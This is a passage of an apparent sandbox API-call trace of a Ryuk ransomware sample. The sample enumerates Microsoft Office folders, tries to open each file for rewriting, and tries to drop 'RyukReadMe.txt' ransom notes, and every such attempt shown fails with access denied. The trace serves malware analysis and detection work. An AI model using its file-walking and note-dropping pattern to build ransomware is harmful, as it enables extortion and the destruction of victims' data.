hTemplateFile=0x0) returned 0xffffffffffffffff [0136.765] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.765] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.765] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.765] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO", dwFileAttributes=0x80) returned 0 [0136.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\securs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.765] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.765] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.766] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.766] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG", dwFileAttributes=0x80) returned 0 [0136.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sharing.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.766] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.766] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.766] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.766] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG", dwFileAttributes=0x80) returned 0 [0136.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\sign.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.767] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.767] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.767] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.767] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.767] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO", dwFileAttributes=0x80) returned 0 [0136.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.768] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.768] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.768] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.768] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.768] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO", dwFileAttributes=0x80) returned 0 [0136.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\signs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.768] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.768] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.768] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.768] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.769] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG", dwFileAttributes=0x80) returned 0 [0136.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimee.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.769] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.769] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.769] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.769] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.769] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG", dwFileAttributes=0x80) returned 0 [0136.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimes.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.770] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.770] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.770] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.770] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO", dwFileAttributes=0x80) returned 0 [0136.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smsl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.770] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.770] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.771] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.771] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO", dwFileAttributes=0x80) returned 0 [0136.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smss.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.771] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.771] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.771] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.771] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG", dwFileAttributes=0x80) returned 0 [0136.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\task.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.772] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.772] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.772] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.772] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.772] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG", dwFileAttributes=0x80) returned 0 [0136.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskacc.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.773] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.773] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.773] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.773] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO", dwFileAttributes=0x80) returned 0 [0136.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.773] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.773] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.773] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.773] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.774] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO", dwFileAttributes=0x80) returned 0 [0136.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.774] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.774] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.774] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.774] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.774] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG", dwFileAttributes=0x80) returned 0 [0136.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdec.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.775] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.775] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.775] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.775] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.775] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO", dwFileAttributes=0x80) returned 0 [0136.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.775] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.776] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.776] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.776] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO", dwFileAttributes=0x80) returned 0 [0136.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.776] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.776] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.776] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.776] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO", dwFileAttributes=0x80) returned 0 [0136.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.777] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.777] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.777] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.777] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.777] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG", dwFileAttributes=0x80) returned 0 [0136.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreq.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.778] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.778] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.778] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.778] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.778] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO", dwFileAttributes=0x80) returned 0 [0136.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreql.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.778] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.778] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.778] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.778] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO", dwFileAttributes=0x80) returned 0 [0136.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreqs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.779] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.779] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.779] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.779] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO", dwFileAttributes=0x80) returned 0 [0136.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\tasks.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.779] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.779] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.780] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.780] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.780] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG", dwFileAttributes=0x80) returned 0 [0136.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKUPD.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskupd.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.781] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.781] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.781] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0136.781] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0136.782] SetLastError (dwErrCode=0x0) [0136.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.784] GetLastError () returned 0x5 [0136.784] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.784] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.784] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0136.785] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0136.785] SetLastError (dwErrCode=0x0) [0136.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.785] GetLastError () returned 0x5 [0136.785] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.785] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.785] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.785] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG", dwFileAttributes=0x80) returned 0 [0136.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FRENCH.LNG" (normalized: "c:\\program files\\microsoft office\\office14\\french.lng"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.785] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.785] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.786] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.786] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.786] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.786] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.786] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.786] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.786] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.786] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO", dwFileAttributes=0x80) returned 0 [0136.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\GRAPH.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\graph.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.786] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.786] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.786] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0136.786] SetLastError (dwErrCode=0x0) [0136.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.786] GetLastError () returned 0x5 [0136.786] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0136.786] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.787] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0136.788] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.788] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.788] SetLastError (dwErrCode=0x0) [0136.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.788] GetLastError () returned 0x5 [0136.788] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0136.788] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.788] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0136.789] FindNextFileW (in: 